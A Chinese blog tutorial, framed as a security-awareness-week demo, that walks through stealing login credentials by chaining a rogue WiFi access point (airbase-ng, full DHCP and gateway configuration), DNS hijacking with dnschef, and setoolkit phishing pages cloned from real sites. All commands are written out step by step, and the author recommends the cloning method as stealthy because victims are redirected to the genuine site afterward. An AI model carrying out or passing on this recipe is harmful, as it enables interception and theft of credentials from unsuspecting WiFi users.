网络安全宣传周演示:钓鱼WIFI+钓鱼网站+DNS劫持组合拳实现用户信息窃取


实验主要目的是为了让受众警惕非法链接WIFI导致的系列问题,以下所有实验均使用Kali虚拟机实现,仅用于技术分享讨论

钓鱼网站

主要利用setoolkit实现,这是一个社工的集成工具集,让不会代码的你,三分钟学会搭建钓鱼网站

Kali输入命令行后出现启动画面,下面的翻译之前有人翻译过了,我直接拿过来整理了

Setoolkit参数翻译

image_1fhha6qbb1qnogsp8j31qp3193um.png-427.4kB

image_1fhha84shouc1ulb1mar1kjt8fg1j.png-165kB

选项分别为

社会工程学攻击
快速追踪测试
第三方模块
升级软件
升级配置
帮助

选择第一个模块

image_1fhhacndri4mqng1rc61k7u1i7920.png-183.9kB

鱼叉式网络攻击
网页攻击
传染媒介式
建立payload和listener
邮件群发攻击
Arduino基础攻击
无线接入点攻击
二维码攻击
Powershell攻击
第三反方模块

这里选择网页攻击

image_1fhhafrpo1o8qgj5oqj1e2rumq2d.png-184.5kB

Java applet攻击
Metasploit浏览器攻击
钓鱼网站攻击
标签钓鱼攻击
网站jacking攻击
多种网站攻击
全屏幕攻击

选择钓鱼网站

image_1fhham1ec1amu19og17if52mr422q.png-88.1kB

网站模板
站点克隆
用自己的网站

这里给我们提供了三种的钓鱼网站方式,我们分别用这三种方式尝试搭建一下钓鱼网站

Web Templates

第一种比较好理解,就是使用已有模板搭建钓鱼网站

image_1fhhaucfi4q319pq1f1nnghh8m3n.png-71.2kB

比如选择Twitter,即可在我们的本地生成Twitter的登陆页面,看一下效果

image_1fhhb1dfraoj1nsedab19dqpo244.png-235.4kB

访问IP

image_1fhhba171ao3qiv1el61uo4rbv4h.png-73.7kB

输入登陆信息

image_1fhhbb3q21ae2koq1vuvi8sm3d4u.png-67kB

image_1fhhbbv3e5t01sbu118h5dus1v5b.png-299.9kB

即可在本地监听到数据

Site Cloner

这个比较好理解,直接克隆互联网上开启的站点

image_1fhhbjukpab73dq1jag7161d6f5o.png-163.7kB

image_1fhhbm77m1uhl10jc1lpu1544qit6h.png-289.4kB

找到需要克隆的站点,直接输入网站域名

image_1fhhbp0um19o16sp9gu173rbu471.png-209.7kB

打开浏览器,访问虚拟机80端口,修改一下显示的数据

image_1fhhbssqb1bl75mek4hikk16e17e.png-41.6kB

成功克隆

image_1fhhbuhcp61bqie21a6qbfjp7r.png-351.2kB

成功监听到数据

Custom Import

顾名思义就是让我们自己构造钓鱼网站的代码了,我们需要在本地构造一下代码,这里直接把上面copy站点的代码拿过来用

image_1fhhip58s1u2s9831vcte0iic288.png-22.3kB

输入源码所在位置,即可生成网站

image_1fhhiqms9l8n5ss1p3g58c14g095.png-123.5kB

image_1fhhk0cg7tcf1sqehi8r2d1s6p9i.png-52.4kB

以上为使用三种不同方式生成钓鱼网站的方法,个人推荐使用第二种,方便也隐蔽,在登陆之后会自动跳转到真实网页当中去,增加了可信度

钓鱼WIFI

这里需要一个无线网卡

image_1fhhkkmp4utp1l941lfe10al2r19v.png-16.3kB

开启无线网卡

ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up
airmon-ng start wlan0

image_1fhhp0rjg1s1a1tcnmb2ttc1kncac.png-336.3kB

创建WIFI,这里WIFI名称我设置为了(1nfo)

airbase-ng -e 1nfo -c 11 wlan0

image_1fhhpli411tv6118ltt6e2vkttb6.png-149.5kB

此时WIFI已经成功开启,但是无法进行链接,因为我们没有设置DHCP

image_1fhhpmtt6hfrf8d8q55ji1mlfbj.png-135.7kB

PC或者手机链接WIFI无法获取到IP地址,我们需要再打开一个终端配置一下DHCP服务

开启虚拟网卡配置网关

ifconfig at0 up
ifconfig at0 10.0.0.1 netmask 255.255.255.0
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
echo 1 > /proc/sys/net/ipv4/ip_forward

同时按照虚拟网卡位置配置DHCP服务器IP

gedit /etc/dhcp/dhcpd.conf

配置:

authoritative;

default-lease-time 700;#默认租约时间
max-lease-time 8000;#设置最大租约时间

subnet 10.0.0.0 netmask 255.255.255.0 {     #设置子网属性,netmask关键字指定子网掩码
option routers 10.0.0.1;           #指定为客户机分配的默认网关地址
option subnet-mask 255.255.255.0;  #指定为客户机分配的子网掩码地址

option domain-name-servers 10.0.0.1;#设置DNS服务器地址

range 10.0.0.10 10.0.0.100;         #设置动态分配的IP地址范围

}

之后开启我们的DHCP服务

dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at0

image_1fhhpsi5a1ue1fd81dm23fn1f39c0.png-295.1kB

出现如上配置即为配置成功,手机或者PC即可链接该WIFI

DNS劫持

我们可以直接使用最简单的劫持,将所有的访问流量都劫持到我们的网关

dnschef -i 10.0.0.1 --fakeip 10.0.0.1

image_1fhhq9d0u12nnlog1roqdsd1bitcd.png-602kB

效果

手机链接WIFI

image_1fhhrhvvmb2m1eguvs45fc5jtdk.png-27.1kB

访问官网

image_1fhhrhaboss01efiu1g1tu7i80d7.png-32.3kB

劫持为二次认证登陆页面,需要用户输入用户名和密码

image_1fhhrj6jfgn8e8t12mtrop1vqve1.png-412.8kB

用户输入用户名和密码后,Kali自动获取到密码


发表评论

邮箱地址不会被公开。 必填项已用*标注